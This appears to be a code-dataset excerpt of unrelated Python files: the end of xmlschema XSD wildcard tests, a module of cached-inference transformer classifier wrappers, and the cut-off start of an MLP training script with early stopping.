xmlns:ns="tns1" targetNamespace="tns1">
<xs:complexType name="type1">
<xs:sequence>
<xs:any notQName="ns:a" processContents="lax" />
</xs:sequence>
</xs:complexType>
</xs:schema>"""), XMLSchema11)
self.check_schema("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:group name="group1">
<xs:sequence>
<xs:any notNamespace="##local" notQName="c d e"/>
</xs:sequence>
</xs:group>
</xs:schema>""", XMLSchemaParseError)
def test_any_wildcard(self):
super(TestXsd11Wildcards, self).test_any_wildcard()
self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##other" notNamespace="##targetNamespace" />
</xs:sequence>
</xs:complexType>""", XMLSchemaParseError)
schema = self.check_schema("""
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any notNamespace="##targetNamespace" />
</xs:sequence>
</xs:complexType>""")
self.assertEqual(schema.types['taggedType'].content[-1].not_namespace, [''])
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:tns1="tns1" targetNamespace="tns1">
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##targetNamespace" notQName="tns1:foo tns1:bar"/>
</xs:sequence>
</xs:complexType>
</xs:schema>""")
self.assertEqual(schema.types['taggedType'].content[-1].not_qname,
['{tns1}foo', '{tns1}bar'])
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:tns1="tns1" targetNamespace="tns1">
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##targetNamespace"
notQName="##defined tns1:foo ##definedSibling"/>
</xs:sequence>
</xs:complexType>
</xs:schema>""")
self.assertEqual(schema.types['taggedType'].content[-1].not_qname,
['##defined', '{tns1}foo', '##definedSibling'])
def test_any_attribute_wildcard(self):
super(TestXsd11Wildcards, self).test_any_attribute_wildcard()
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:tns1="tns1" targetNamespace="tns1">
<xs:complexType name="taggedType">
<xs:sequence>
<xs:element name="tag" type="xs:string"/>
<xs:any namespace="##other" processContents="skip"/>
</xs:sequence>
<xs:anyAttribute notQName="tns1:foo"/>
</xs:complexType>
</xs:schema>""")
self.assertEqual(schema.types['taggedType'].attributes[None].namespace, ('##any',))
self.assertEqual(schema.types['taggedType'].attributes[None].not_qname, ['{tns1}foo'])
schema = self.schema_class("""
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:complexType name="barType">
<xs:anyAttribute notNamespace="tns1"/>
</xs:complexType>
</xs:schema>""")
self.assertEqual(schema.types['barType'].attributes[None].not_namespace, ['tns1'])
self.assertEqual(repr(schema.types['barType'].attributes[None]),
"Xsd11AnyAttribute(not_namespace=['tns1'], process_contents='strict')")
if __name__ == '__main__':
import platform
header_template = "Test xmlschema's XSD wildcards with Python {} on {}"
header = header_template.format(platform.python_version(), platform.platform())
print('{0}\n{1}\n{0}'.format("*" * len(header), header))
unittest.main()
| 42.245074 | 96 | 0.563974 | 3,508 | 34,303 | 5.45667 | 0.062144 | 0.032128 | 0.059241 | 0.031449 | 0.878801 | 0.823059 | 0.784662 | 0.741981 | 0.701755 | 0.687337 | 0 | 0.023285 | 0.268869 | 34,303 | 811 | 97 | 42.297164 | 0.739952 | 0.036906 | 0 | 0.732374 | 0 | 0.011511 | 0.635192 | 0.08651 | 0 | 0 | 0 | 0 | 0.155396 | 1 | 0.030216 | false | 0 | 0.007194 | 0 | 0.041727 | 0.001439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
539ad43c1ec30c7c01590cc967a03bb5fdc596ff | 32,106 | py | Python | src/ue4nlp/transformers_cached.py | AIRI-Institute/uncertainty_transformers | 982b5ae8b39cb484ce3559a72f95d18f30487e38 | [
"MIT"
] | null | null | null | src/ue4nlp/transformers_cached.py | AIRI-Institute/uncertainty_transformers | 982b5ae8b39cb484ce3559a72f95d18f30487e38 | [
"MIT"
] | null | null | null | src/ue4nlp/transformers_cached.py | AIRI-Institute/uncertainty_transformers | 982b5ae8b39cb484ce3559a72f95d18f30487e38 | [
"MIT"
] | null | null | null | from typing import Optional
import torch
import torch.nn as nn
from torch.nn import (
CrossEntropyLoss,
BCEWithLogitsLoss,
MSELoss,
)
from transformers import (
BertForTokenClassification,
BertForSequenceClassification,
DistilBertForTokenClassification,
ElectraForTokenClassification,
ElectraForSequenceClassification,
RobertaForSequenceClassification,
DebertaForSequenceClassification,
DebertaForTokenClassification,
    DistilBertForSequenceClassification,
)
from transformers.modeling_outputs import (
SequenceClassifierOutput,
BaseModelOutputWithPoolingAndCrossAttentions,
)
class BertForTokenClassificationCached(BertForTokenClassification):
def __init__(self, config):
super().__init__(config)
self.use_cache = False
self.cache_size = None
self.cache = dict()
def empty_cache(self):
self.cache.clear()
def enable_cache(self):
self.use_cache = True
def disable_cache(self):
self.use_cache = False
self.cache_size = None
self.empty_cache()
def set_cache_size(self, size: Optional[int] = 25):
self.cache_size = size
@staticmethod
def create_cache_key(tensor: torch.Tensor) -> int:
return hash(frozenset(tensor.cpu().numpy().ravel()))
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
):
cache_key = self.create_cache_key(input_ids)
if not self.use_cache or cache_key not in self.cache:
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
if self.use_cache and (
self.cache_size is None or len(self.cache) < self.cache_size
):
# print('WRITING TO CACHE')
# self.cache[cache_key] = outputs
self.cache[cache_key] = tuple(o.detach().cpu() for o in outputs)
else:
# print('USING CACHED OUTPUTS')
# outputs = self.cache[cache_key]
outputs = tuple(o.cuda() for o in self.cache[cache_key])
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
logits = self.classifier(sequence_output)
outputs = (logits,) + outputs[
2:
] # add hidden states and attention if they are here
if labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = logits.view(-1, self.num_labels)
active_labels = torch.where(
active_loss,
labels.view(-1),
torch.tensor(loss_fct.ignore_index).type_as(labels),
)
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
outputs = (loss,) + outputs
return outputs # (loss), scores, (hidden_states), (attentions)
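The caching pattern above (hash the input ids, memoize the encoder outputs, optionally bound the cache size) can be isolated in a torch-free sketch; `CachedCompute` and its dummy workload are illustrative stand-ins, not part of this module:

```python
class CachedCompute:
    """Minimal mirror of the caching logic: memoize an expensive call,
    keyed by a hash of the input, up to an optional cache_size bound."""

    def __init__(self):
        self.use_cache = False
        self.cache_size = None
        self.cache = {}

    def enable_cache(self, size=None):
        self.use_cache = True
        self.cache_size = size

    @staticmethod
    def create_cache_key(values):
        # Same idea as hashing the raveled tensor above.
        return hash(frozenset(values))

    def forward(self, values):
        key = self.create_cache_key(values)
        if not self.use_cache or key not in self.cache:
            result = sum(v * v for v in values)  # stand-in for the encoder pass
            if self.use_cache and (
                self.cache_size is None or len(self.cache) < self.cache_size
            ):
                self.cache[key] = result
        else:
            result = self.cache[key]
        return result
```

Note that `frozenset` discards element order and multiplicity, so distinct inputs sharing the same value set would collide under this key; a tuple-based key (`hash(tuple(...))`) would avoid that at the cost of a slightly larger hash input.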
class DistilBertForTokenClassificationCached(DistilBertForTokenClassification):
def __init__(self, config):
super().__init__(config)
self.use_cache = False
self.cache_size = None
self.cache = dict()
def empty_cache(self):
self.cache.clear()
def enable_cache(self):
self.use_cache = True
    def disable_cache(self):
        self.use_cache = False
        self.cache_size = None
        self.empty_cache()
def set_cache_size(self, size: Optional[int] = 25):
self.cache_size = size
@staticmethod
def create_cache_key(tensor: torch.Tensor) -> int:
return hash(frozenset(tensor.cpu().numpy().ravel()))
def forward(
self,
input_ids=None,
attention_mask=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
):
cache_key = self.create_cache_key(input_ids)
if not self.use_cache or cache_key not in self.cache:
outputs = self.distilbert(
input_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
if self.use_cache and (
self.cache_size is None or len(self.cache) < self.cache_size
):
# print('WRITING TO CACHE')
# self.cache[cache_key] = outputs
self.cache[cache_key] = tuple(o.detach().cpu() for o in outputs)
else:
# print('USING CACHED OUTPUTS')
# outputs = self.cache[cache_key]
outputs = tuple(o.cuda() for o in self.cache[cache_key])
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
logits = self.classifier(sequence_output)
outputs = (logits,) + outputs[
1:
] # add hidden states and attention if they are here
if labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = logits.view(-1, self.num_labels)
active_labels = torch.where(
active_loss,
labels.view(-1),
torch.tensor(loss_fct.ignore_index).type_as(labels),
)
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
outputs = (loss,) + outputs
return outputs # (loss), scores, (hidden_states), (attentions)
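# Note on create_cache_key above: hashing a frozenset discards element order and
# multiplicity, so two different input_ids tensors that contain the same set of
# token ids (e.g. permutations of one another) collide on the same cache key.
# A sketch of an order-sensitive alternative (hypothetical helper, not used by
# the classes in this file); it hashes the raw bytes of the raveled array,
# e.g. of tensor.cpu().numpy():
def _create_cache_key_bytes(array) -> int:
    import numpy as np

    # bytes of the raveled array preserve order and repeats, so permuted or
    # repeated ids produce distinct keys
    return hash(np.asarray(array).ravel().tobytes())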

class ElectraForTokenClassificationCached(ElectraForTokenClassification):
    def __init__(self, config):
        super().__init__(config)
        self.use_cache = False
        self.cache_size = None
        self.cache = dict()

    def empty_cache(self):
        self.cache.clear()

    def enable_cache(self):
        self.use_cache = True

    def disable_cache(self):
        self.use_cache = False
        self.empty_cache()

    def set_cache_size(self, size: Optional[int] = 1000):
        self.cache_size = size

    @staticmethod
    def create_cache_key(tensor: torch.Tensor) -> int:
        return hash(frozenset(tensor.cpu().numpy().ravel()))

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
    ):
        cache_key = self.create_cache_key(input_ids)
        if not self.use_cache or cache_key not in self.cache:
            discriminator_hidden_states = self.electra(
                input_ids,
                attention_mask=attention_mask,
                token_type_ids=token_type_ids,
                position_ids=position_ids,
                head_mask=head_mask,
                inputs_embeds=inputs_embeds,
                output_attentions=output_attentions,
                output_hidden_states=output_hidden_states,
            )
            if self.use_cache and (
                self.cache_size is None or len(self.cache) < self.cache_size
            ):
                # print('WRITING TO CACHE')
                # self.cache[cache_key] = discriminator_hidden_states
                # iterate the tuple elements directly (indexing the tuple with
                # its own tensor elements was a bug)
                self.cache[cache_key] = tuple(
                    o.detach().cpu() for o in discriminator_hidden_states
                )
        else:
            # print('USING CACHED OUTPUTS')
            discriminator_hidden_states = tuple(
                o.cuda() for o in self.cache[cache_key]
            )

        discriminator_sequence_output = discriminator_hidden_states[0]
        discriminator_sequence_output = self.dropout(discriminator_sequence_output)
        logits = self.classifier(discriminator_sequence_output)

        output = (logits,)

        if labels is not None:
            loss_fct = CrossEntropyLoss()
            # Only keep active parts of the loss
            if attention_mask is not None:
                active_loss = attention_mask.view(-1) == 1
                active_logits = logits.view(-1, self.config.num_labels)[active_loss]
                active_labels = labels.view(-1)[active_loss]
                loss = loss_fct(active_logits, active_labels)
            else:
                loss = loss_fct(
                    logits.view(-1, self.config.num_labels), labels.view(-1)
                )
            output = (loss,) + output

        output += discriminator_hidden_states[1:]
        return output  # (loss), scores, (hidden_states), (attentions)

class CachedInferenceMixin:
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.use_cache = False
        self.cache_size = None
        self.cache = dict()

    def empty_cache(self):
        self.cache.clear()

    def enable_cache(self):
        self.use_cache = True

    def disable_cache(self):
        self.use_cache = False
        self.empty_cache()

    def set_cache_size(self, size: Optional[int] = 25):
        self.cache_size = size

    @staticmethod
    def create_cache_key(tensor: torch.Tensor) -> int:
        return hash(frozenset(tensor.cpu().numpy().ravel()))

    def inference_body(
        self,
        body,
        input_ids,
        attention_mask,
        token_type_ids,
        position_ids,
        head_mask,
        inputs_embeds,
        output_attentions,
        output_hidden_states,
        return_dict,
    ):
        cache_key = self.create_cache_key(input_ids)
        if not self.use_cache or cache_key not in self.cache:
            if head_mask is not None:
                hidden_states = body(
                    input_ids=input_ids,
                    attention_mask=attention_mask,
                    token_type_ids=token_type_ids,
                    position_ids=position_ids,
                    head_mask=head_mask,
                    inputs_embeds=inputs_embeds,
                    output_attentions=output_attentions,
                    output_hidden_states=output_hidden_states,
                    return_dict=return_dict,
                )
            else:
                hidden_states = body(
                    input_ids=input_ids,
                    attention_mask=attention_mask,
                    token_type_ids=token_type_ids,
                    position_ids=position_ids,
                    inputs_embeds=inputs_embeds,
                    output_attentions=output_attentions,
                    output_hidden_states=output_hidden_states,
                    return_dict=return_dict,
                )
            if self.use_cache and (
                self.cache_size is None or len(self.cache) < self.cache_size
            ):
                # Tuples (hidden_states/attentions) are kept as-is; this is
                # needed for the metric regularizer, which sets output_hidden
                # to True
                self.cache[cache_key] = {
                    n: o.detach().cpu()
                    if (o is not None and not isinstance(o, tuple))
                    else o
                    for n, o in hidden_states.__dict__.items()
                }
        else:
            hidden_states = BaseModelOutputWithPoolingAndCrossAttentions(
                **{
                    n: o.cuda() if (o is not None and not isinstance(o, tuple)) else o
                    for n, o in self.cache[cache_key].items()
                }
            )
        return hidden_states

class ElectraForSequenceClassificationCached(
    CachedInferenceMixin, ElectraForSequenceClassification
):
    def __init__(self, config):
        super().__init__(config)

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        return_dict = (
            return_dict if return_dict is not None else self.config.use_return_dict
        )

        discriminator_hidden_states = self.inference_body(
            self.electra,
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        sequence_output = discriminator_hidden_states[0]
        logits = self.classifier(sequence_output)

        loss = None
        if labels is not None:
            if self.num_labels == 1:
                # We are doing regression
                loss_fct = MSELoss()
                loss = loss_fct(logits.view(-1), labels.view(-1))
            else:
                loss_fct = CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))

        if not return_dict:
            output = (logits,) + discriminator_hidden_states[1:]
            return ((loss,) + output) if loss is not None else output

        return SequenceClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=discriminator_hidden_states.hidden_states,
            attentions=discriminator_hidden_states.attentions,
        )

class BertForSequenceClassificationCached(
    CachedInferenceMixin, BertForSequenceClassification
):
    def __init__(self, config):
        super().__init__(config)

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        return_dict = (
            return_dict if return_dict is not None else self.config.use_return_dict
        )

        outputs = self.inference_body(
            body=self.bert,
            input_ids=input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        pooled_output = outputs[1]
        pooled_output = self.dropout(pooled_output)
        logits = self.classifier(pooled_output)

        loss = None
        if labels is not None:
            if self.num_labels == 1:
                # We are doing regression
                loss_fct = MSELoss()
                loss = loss_fct(logits.view(-1), labels.view(-1))
            else:
                loss_fct = CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))

        if not return_dict:
            output = (logits,) + outputs[2:]
            return ((loss,) + output) if loss is not None else output

        return SequenceClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )

class RobertaForSequenceClassificationCached(
    CachedInferenceMixin, RobertaForSequenceClassification
):
    def __init__(self, config):
        super().__init__(config)

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        return_dict = (
            return_dict if return_dict is not None else self.config.use_return_dict
        )

        discriminator_hidden_states = self.inference_body(
            self.roberta,
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        sequence_output = discriminator_hidden_states[0]
        logits = self.classifier(sequence_output)

        loss = None
        if labels is not None:
            if self.num_labels == 1:
                # We are doing regression
                loss_fct = MSELoss()
                loss = loss_fct(logits.view(-1), labels.view(-1))
            else:
                loss_fct = CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))

        if not return_dict:
            output = (logits,) + discriminator_hidden_states[1:]
            return ((loss,) + output) if loss is not None else output

        return SequenceClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=discriminator_hidden_states.hidden_states,
            attentions=discriminator_hidden_states.attentions,
        )

class DebertaForSequenceClassificationCached(
    CachedInferenceMixin, DebertaForSequenceClassification
):
    def __init__(self, config):
        super().__init__(config)

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        return_dict = (
            return_dict if return_dict is not None else self.config.use_return_dict
        )

        discriminator_hidden_states = self.inference_body(
            self.deberta,
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=None,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        encoder_layer = discriminator_hidden_states[0]
        pooled_output = self.pooler(encoder_layer)
        pooled_output = self.dropout(pooled_output)
        logits = self.classifier(pooled_output)

        loss = None
        if labels is not None:
            if self.num_labels == 1:
                # We are doing regression
                loss_fct = MSELoss()
                loss = loss_fct(logits.view(-1), labels.view(-1))
            else:
                loss_fct = CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))

        if not return_dict:
            output = (logits,) + discriminator_hidden_states[1:]
            return ((loss,) + output) if loss is not None else output

        return SequenceClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=discriminator_hidden_states.hidden_states,
            attentions=discriminator_hidden_states.attentions,
        )

class DebertaForTokenClassificationCached(CachedInferenceMixin, DebertaForTokenClassification):
    def __init__(self, config):
        super().__init__(config)

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        return_dict = (
            return_dict if return_dict is not None else self.config.use_return_dict
        )

        discriminator_hidden_states = self.inference_body(
            self.deberta,
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=None,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        sequence_output = discriminator_hidden_states[0]
        sequence_output = self.dropout(sequence_output)
        logits = self.classifier(sequence_output)

        output = (logits,)

        if labels is not None:
            loss_fct = CrossEntropyLoss()
            # Only keep active parts of the loss
            if attention_mask is not None:
                active_loss = attention_mask.view(-1) == 1
                active_logits = logits.view(-1, self.config.num_labels)[active_loss]
                active_labels = labels.view(-1)[active_loss]
                loss = loss_fct(active_logits, active_labels)
            else:
                loss = loss_fct(
                    logits.view(-1, self.config.num_labels), labels.view(-1)
                )
            output = (loss,) + output

        output += discriminator_hidden_states[1:]
        return output  # (loss), scores, (hidden_states), (attentions)

class DistilBertCachedInferenceMixin:
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.use_cache = False
        self.cache_size = None
        self.cache = dict()

    def empty_cache(self):
        self.cache.clear()

    def enable_cache(self):
        self.use_cache = True

    def disable_cache(self):
        self.use_cache = False
        self.empty_cache()

    def set_cache_size(self, size: Optional[int] = 25):
        self.cache_size = size

    @staticmethod
    def create_cache_key(tensor: torch.Tensor) -> int:
        return hash(frozenset(tensor.cpu().numpy().ravel()))

    def inference_body(
        self,
        body,
        input_ids,
        attention_mask,
        head_mask,
        inputs_embeds,
        output_attentions,
        output_hidden_states,
        return_dict,
    ):
        cache_key = self.create_cache_key(input_ids)
        if not self.use_cache or cache_key not in self.cache:
            hidden_states = body(
                input_ids=input_ids,
                attention_mask=attention_mask,
                head_mask=head_mask,
                inputs_embeds=inputs_embeds,
                output_attentions=output_attentions,
                output_hidden_states=output_hidden_states,
                return_dict=return_dict,
            )
            if self.use_cache and (
                self.cache_size is None or len(self.cache) < self.cache_size
            ):
                # Tuples (hidden_states/attentions) are kept as-is; this is
                # needed for the metric regularizer, which sets output_hidden
                # to True
                self.cache[cache_key] = {
                    n: o.detach().cpu()
                    if (o is not None and not isinstance(o, tuple))
                    else o
                    for n, o in hidden_states.__dict__.items()
                }
        else:
            hidden_states = BaseModelOutputWithPoolingAndCrossAttentions(
                **{
                    n: o.cuda() if (o is not None and not isinstance(o, tuple)) else o
                    for n, o in self.cache[cache_key].items()
                }
            )
        return hidden_states

# NOTE: this redefines DistilBertForTokenClassificationCached and replaces the
# version defined earlier in the file.
class DistilBertForTokenClassificationCached(DistilBertForTokenClassification):
    def __init__(self, config):
        super().__init__(config)
        self.use_cache = False
        self.cache_size = None
        self.cache = dict()

    def empty_cache(self):
        self.cache.clear()

    def enable_cache(self):
        self.use_cache = True

    def disable_cache(self):
        self.use_cache = False
        self.empty_cache()

    def set_cache_size(self, size: Optional[int] = 25):
        self.cache_size = size

    @staticmethod
    def create_cache_key(tensor: torch.Tensor) -> int:
        return hash(frozenset(tensor.cpu().numpy().ravel()))

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
    ):
        cache_key = self.create_cache_key(input_ids)
        if not self.use_cache or cache_key not in self.cache:
            outputs = self.distilbert(
                input_ids,
                attention_mask=attention_mask,
                head_mask=head_mask,
                inputs_embeds=inputs_embeds,
                output_attentions=output_attentions,
                output_hidden_states=output_hidden_states,
            )
            if self.use_cache and (
                self.cache_size is None or len(self.cache) < self.cache_size
            ):
                # print('WRITING TO CACHE')
                # self.cache[cache_key] = outputs
                # iterate the tuple elements directly (indexing the tuple with
                # its own tensor elements was a bug)
                self.cache[cache_key] = tuple(o.detach().cpu() for o in outputs)
        else:
            # print('USING CACHED OUTPUTS')
            # outputs = self.cache[cache_key]
            outputs = tuple(o.cuda() for o in self.cache[cache_key])

        sequence_output = outputs[0]
        sequence_output = self.dropout(sequence_output)
        logits = self.classifier(sequence_output)

        outputs = (logits,) + outputs[
            1:
        ]  # add hidden states and attention if they are here
        if labels is not None:
            loss_fct = CrossEntropyLoss()
            # Only keep active parts of the loss
            if attention_mask is not None:
                active_loss = attention_mask.view(-1) == 1
                active_logits = logits.view(-1, self.num_labels)
                active_labels = torch.where(
                    active_loss,
                    labels.view(-1),
                    torch.tensor(loss_fct.ignore_index).type_as(labels),
                )
                loss = loss_fct(active_logits, active_labels)
            else:
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
            outputs = (loss,) + outputs

        return outputs  # (loss), scores, (hidden_states), (attentions)

class DistilBertForSequenceClassificationCached(
    DistilBertCachedInferenceMixin, DistilBertForSequenceClassification
):
    def __init__(self, config):
        super().__init__(config)

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        return_dict = (
            return_dict if return_dict is not None else self.config.use_return_dict
        )

        distilbert_output = self.inference_body(
            self.distilbert,
            input_ids,
            attention_mask=attention_mask,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        hidden_state = distilbert_output[0]  # (bs, seq_len, dim)
        pooled_output = hidden_state[:, 0]  # (bs, dim)
        pooled_output = self.pre_classifier(pooled_output)  # (bs, dim)
        pooled_output = nn.ReLU()(pooled_output)  # (bs, dim)
        pooled_output = self.dropout(pooled_output)  # (bs, dim)
        logits = self.classifier(pooled_output)  # (bs, num_labels)

        loss = None
        if labels is not None:
            if self.config.problem_type is None:
                if self.num_labels == 1:
                    self.config.problem_type = "regression"
                elif self.num_labels > 1 and (
                    labels.dtype == torch.long or labels.dtype == torch.int
                ):
                    self.config.problem_type = "single_label_classification"
                else:
                    self.config.problem_type = "multi_label_classification"

            if self.config.problem_type == "regression":
                loss_fct = MSELoss()
                if self.num_labels == 1:
                    loss = loss_fct(logits.squeeze(), labels.squeeze())
                else:
                    loss = loss_fct(logits, labels)
            elif self.config.problem_type == "single_label_classification":
                loss_fct = CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
            elif self.config.problem_type == "multi_label_classification":
                loss_fct = BCEWithLogitsLoss()
                loss = loss_fct(logits, labels)

        if not return_dict:
            output = (logits,) + distilbert_output[1:]
            return ((loss,) + output) if loss is not None else output

        return SequenceClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=distilbert_output.hidden_states,
            attentions=distilbert_output.attentions,
        )

class ElectraForSequenceClassificationAllLayers(ElectraForSequenceClassification):
    def __init__(self, config):
        super().__init__(config)

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=True,
        return_dict=None,
    ):
        return_dict = (
            return_dict if return_dict is not None else self.config.use_return_dict
        )

        discriminator_hidden_states = self.electra(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        features = discriminator_hidden_states[0]
        logits = self.classifier(features)

        loss = None
        if labels is not None:
            if self.num_labels == 1:
                # We are doing regression
                loss_fct = MSELoss()
                loss = loss_fct(logits.view(-1), labels.view(-1))
            else:
                loss_fct = CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))

        # Keep only the first-token position of each layer's hidden states,
        # moved to CPU
        hidden_states = [
            hs.detach().cpu()[:, 0, :]
            for hs in discriminator_hidden_states.hidden_states
        ]
        discriminator_hidden_states.hidden_states = hidden_states

        if not return_dict:
            output = (logits,) + discriminator_hidden_states[1:]
            return ((loss,) + output) if loss is not None else output

        return SequenceClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=discriminator_hidden_states.hidden_states,
            attentions=discriminator_hidden_states.attentions,
        )


# model_scripts/MLP.py (Bogeluno/GNN_Thesis, MIT license)
import sys
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.nn.init as init
import pickle
import time
from sklearn.metrics import r2_score, classification_report
pd.set_option('mode.chained_assignment',None)

class EarlyStopping:
    """Early stops the training if validation loss doesn't improve after a given patience."""

    def __init__(self, patience=20, verbose=False, path='checkpoint.pt', trace_func=print):
        """
        Args:
            patience (int): How long to wait after last time validation loss improved.
                            Default: 20
            verbose (bool): If True, prints a message for each validation loss improvement.
                            Default: False
            path (str): Path for the checkpoint to be saved to.
                            Default: 'checkpoint.pt'
            trace_func (function): trace print function.
                            Default: print
        """
        self.patience = patience
        self.verbose = verbose
        self.counter = 0
        self.best_score = None
        self.early_stop = False
        self.val_loss_min = np.inf
        self.path = path
        self.trace_func = trace_func  # was missing; save_checkpoint relies on it

    def __call__(self, val_loss, model):
        score = -val_loss

        if self.best_score is None:
            self.best_score = score
            self.save_checkpoint(val_loss, model)
        elif score < self.best_score:
            self.counter += 1
            if self.counter >= self.patience:
                self.early_stop = True
        else:
            self.best_score = score
            self.save_checkpoint(val_loss, model)
            self.counter = 0

    def save_checkpoint(self, val_loss, model):
        '''Saves model when validation loss decreases.'''
        if self.verbose:
            self.trace_func(f'Validation loss decreased ({self.val_loss_min:.6f} --> {val_loss:.6f}). Saving model ...')
